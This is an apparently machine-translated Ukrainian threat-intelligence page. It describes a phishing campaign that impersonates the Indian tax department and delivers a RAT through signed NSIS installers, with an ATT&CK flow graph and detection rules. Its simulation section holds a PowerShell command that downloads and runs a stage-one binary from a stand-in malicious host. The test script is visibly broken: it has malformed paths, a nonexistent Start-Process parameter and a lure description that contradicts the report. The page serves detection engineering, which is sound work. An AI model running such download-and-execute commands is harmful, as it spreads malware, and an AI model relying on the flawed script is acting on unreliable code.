Стежити
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Операція фішингу, яка імітує Індійське податкове управління, доставляє замінований PDF, який перенаправляє отримувачів на підробний портал відповідності. Сайт запрошує жертву завантажити ZIP-пакет, що містить підписаний NSIS-інсталятор, який потім розгортає багатоступеневий троян для віддаленого доступу. RAT зберігає активність, створюючи службу Windows, і спілкується з кількома серверами C2 через нестандартні порти.
Розслідування
Дослідники проаналізували PDF-пастку, вбудовану URL-адресу та робочий процес ланцюгового інсталятора NSIS. Вони задокументували виконувані файли, що були розміщені на диску, створення прихованої папки з установкою і реєстрацію NSecRTS.exe як служби Windows. У звіті також були захоплені вихідні зв’язки з трьома IP-адресами та підкреслено використання підписаних корисних навантажень по всьому ланцюгу доставки.
Пом’якшення
Заблокуйте зловмисний домен та пов’язані IP-адреси на периметрі та через проксі-контролі. Посильте захист електронної пошти для маркування тем податкової тематики і посилань, що ведуть до порталів, схожих на портали відповідності. Запобігайте автоматичному виконанню неперевірених інсталяторів, де можливо, і контролюйте створення підозрілих служб — особливо тих, що мають назву «Служба захисту в режимі реального часу Windows».
Відповідь
Сигналізуйте про наведені імена файлів, хеші та активність реєстрації сервісів Windows, пов’язаних із ланцюгом інфекцій. Ізолюйте уражені кінцеві точки, отримайте зображення пам’яті та диска, та проведіть повне судово-медичне дослідження, щоб виявити будь-які додаткові стадії RAT або інструменти. Видаліть артефакти збереження та скиньте потенційно скомпрометовані облікові дані, щоб запобігти повторному входу.
graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 classDef file fill:#e6e6e6 %% Nodes – Actions (MITRE Techniques) action_phishing_attachment[“<b>Дія</b> – T1566.001: <b>Фішинг із вкладенням</b><br/>Електронний лист із шкідливим PDF «Review Annexure.pdf» доставляється жертві.”] class action_phishing_attachment action action_phishing_link[“<b>Дія</b> – T1566.002: <b>Фішингове посилання</b><br/>PDF містить посилання на фальшивий портал Податкової служби (hxxps://www.akjys.top/).”] class action_phishing_link action action_user_execution[“<b>Дія</b> – T1204.002: <b>Виконання користувачем</b><br/>Жертва натискає посилання, ZIP-файл автоматично завантажується, і інсталятор запускається.”] class action_user_execution action action_code_signing[“<b>Дія</b> – T1553.002: <b>Підписування коду</b><br/>Інсталятори NSIS підписані сертифікатами, що виглядають легітимно.”] class action_code_signing action action_signed_binary_proxy[“<b>Дія</b> – T1218: <b>Виконання через підписаний бінарник</b><br/>Підписаний інсталятор NSIS запускає шкідливий пейлоад, обходячи захисні механізми.”] class action_signed_binary_proxy action action_obfuscation[“<b>Дія</b> – T1027.002: <b>Пакування ПЗ</b><br/>Багатоступеневі обгортки NSIS шифрують і приховують шкідливі бінарні файли.”] class action_obfuscation action action_persistence_service_perm[“<b>Дія</b> – T1574.010: <b>Вразливі права доступу до сервісних файлів</b><br/>Інсталятор змінює права доступу до файлів служби.”] class action_persistence_service_perm action action_persistence_service[“<b>Дія</b> – T1569.002: <b>Виконання через службу</b><br/>Реєструє NSecRTS.exe як службу Windows «Windows Real-time Protection Service».”] class action_persistence_service action action_discovery_system[“<b>Дія</b> – T1082: <b>Виявлення інформації про систему</b><br/>RAT збирає версію ОС та апаратні характеристики.”] class action_discovery_system action action_discovery_software[“<b>Дія</b> – T1518: <b>Виявлення програмного забезпечення</b><br/>RAT перелічує встановлені застосунки та служби, зберігає дані в C:\\Program Files\\Common Files\\NSEC\\Data.”] class action_discovery_software action action_c2_web[“<b>Дія</b> – T1071.001: <b>Веб-протоколи</b><br/>Зв’язок із C2 через HTTP/HTTPS.”] class action_c2_web action action_c2_nonstandard[“<b>Дія</b> – T1571: <b>Нестандартні порти</b><br/>Використовує порти 48991, 48992, 3898 для C2-трафіку.”] class action_c2_nonstandard action action_c2_bidirectional[“<b>Дія</b> – T1102.002: <b>Двосторонній веб-сервіс</b><br/>Забезпечує двосторонній зв’язок із сервером.”] class action_c2_bidirectional action action_remote_access[“<b>Дія</b> – T1219: <b>Інструменти віддаленого доступу</b><br/>Зловмисник виконує команди, викрадає дані та підтримує контроль.”] class action_remote_access action action_exfiltration_scheduled[“<b>Дія</b> – T1029: <b>Запланована передача</b><br/>Зібрані дані періодично надсилаються на C2-сервер через POST.”] class action_exfiltration_scheduled action action_defense_evasion[“<b>Дія</b> – T1070.004: <b>Видалення файлів</b><br/>Завантажувач видаляє скинуті файли та тимчасові папки після виконання.”] class action_defense_evasion action action_multi_stage[“<b>Дія</b> – T1104: <b>Багатоступеневі канали</b><br/>Послідовні інсталятори доставляють фінальний RAT-пейлоад.”] class action_multi_stage action %% Nodes – Tools / Files / Malware tool_nsis_installer[“<b>Інструмент</b> – <b>Назва</b>: Інсталятор NSIS<br/><b>Опис</b>: Підписаний інсталятор, що використовується для запуску пейлоаду.”] class tool_nsis_installer tool malware_rat[“<b>Шкідливе ПЗ</b> – <b>Назва</b>: NSEC RAT<br/><b>Опис</b>: Троян віддаленого доступу з повним контролем над системою.”] class malware_rat malware file_pdf[“<b>Файл</b> – <b>Назва</b>: Review Annexure.pdf<br/><b>Тип</b>: Шкідливе PDF-вкладення.”] class file_pdf file file_zip[“<b>Файл</b> – <b>Назва</b>: Review Annexure.zip<br/><b>Тип</b>: Архів з інсталятором NSIS.”] class file_zip file file_exe[“<b>Файл</b> – <b>Назва</b>: NSecRTS.exe<br/><b>Тип</b>: Виконуваний файл служби Windows.”] class file_exe file %% Connections – Attack Flow action_phishing_attachment –>|contains| file_pdf file_pdf –>|links to| action_phishing_link action_phishing_link –>|leads to| file_zip file_zip –>|executed by| action_user_execution action_user_execution –>|uses| tool_nsis_installer tool_nsis_installer –>|signed with| action_code_signing action_code_signing –>|enables| action_signed_binary_proxy action_signed_binary_proxy –>|obfuscates via| action_obfuscation action_obfuscation –>|creates| malware_rat malware_rat –>|installed as| action_persistence_service_perm action_persistence_service_perm –>|enables| action_persistence_service action_persistence_service –>|executes| file_exe file_exe –>|collects via| action_discovery_system file_exe –>|collects via| action_discovery_software action_discovery_system –>|sends data to| action_c2_web action_discovery_software –>|sends data to| action_c2_web action_c2_web –>|uses ports| action_c2_nonstandard action_c2_web –>|uses channel| action_c2_bidirectional action_c2_bidirectional –>|provides| action_remote_access action_remote_access –>|performs| action_exfiltration_scheduled action_exfiltration_scheduled –>|triggers| action_defense_evasion action_defense_evasion –>|precedes| action_multi_stage %% Styling class tool_nsis_installer, file_pdf, file_zip, file_exe tool class malware_rat malware class action_* action
Потік атаки
Виявлення
Підозріле командування і контроль через запит DNS незвичного рівня домену верхнього рівня (TLD)
Переглянути
IOCs (DestinationIP) для виявлення: Фішингова кампанія з темою Індійського податкового управління націлена на місцеві бізнеси
Переглянути
IOCs (SourceIP) для виявлення: Фішингова кампанія з темою Індійського податкового управління націлена на місцеві бізнеси
Переглянути
IOCs (HashMd5) для виявлення: Фішингова кампанія з темою Індійського податкового управління націлена на місцеві бізнеси
Переглянути
Виявлення виконання шкідливого ПЗ у кампанії фішингу з темою Індійського податкового управління [Створення процесу Windows]
Переглянути
Виявлення C2-комунікації NSecRTS.exe [Мережеве підключення Windows]
Переглянути
Виконання симуляції
Передумова: Перевірка телеметрії та базових даних перед польотом повинна бути пройдена.
Мотивування: У цьому розділі детально описується точне виконання техніки зловмисника (TTP), розроблене для активації правила виявлення. Команди та опис ПОВИННІ безпосередньо відображати ідентифіковані TTP і мати на меті створити точну телеметрію, очікувану логікою виявлення.
-
Атака: Нарратив та команди:
Зловмисник доставляє фішинговий електронний лист під назвою «Податкова повістка». Підключення – це зловмисний документ Word, який скидаєsetup_Ir5swQ3EpeuBpePEpew=.exeto%TEMP%.Жертва виконує файл, який у свою чергу запускаєSibuia.exe(справжній корисний вантаж) як свій потомок. Цей ланцюг «батько-дитина» спроектований для обходу загальних попереджень про створення процесів, але виявлений правилом Sigma.Кроки, які виконуються на скомпрометованому хості:
- Скидання бінарного файлу першого етапу:
$stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1 - Виконання бінарного файлу першого етапу:
Start-Process -FilePath $stage1 -NoNewWindow - Бінарний файл першого етапу внутрішньо створює бінарний файл другого етапу
Sibuia.exeв тій самій директорії і запускає його: (Симулюється нижченаведеним тестовим скриптом.)
- Скидання бінарного файлу першого етапу:
-
Скрипт для регресійного тестування:
Скрипт нижче відтворює точний зв’язок «батько-дитина», необхідний для спрацювання правила.# ------------------------------------------------- # Симуляція фішингового ланцюга Податкової інспекції Індії # ------------------------------------------------- # Визначення шляхів $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" $stage2 = "$env:TEMPSibuia.exe" # Створення макетів бінарних файлів (нульові байти — досить для ведення журналу Sysmon) Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII # Переконатися, що файли виконувані (Windows не потребує chmod) Write-Host "[*] Запуск stage1..." $proc1 = Start-Process -FilePath $stage1 -PassThru # Дати stage1 момент на "створення" stage2 (симулюється прямим запуском) Start-Sleep -Milliseconds 500 Write-Host "[*] Stage1 створює stage2 (Sibuia.exe)..." $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host "[+] Симуляція завершена. Перевірте виявлення в SIEM." # ------------------------------------------------- -
Команди для очищення:
Видалити артефакти та завершити будь-які залишкові процеси.# Зупинка будь-яких залишкових процесів Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force # Видалення файлів Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue Write-Host "[*] Очищення завершено."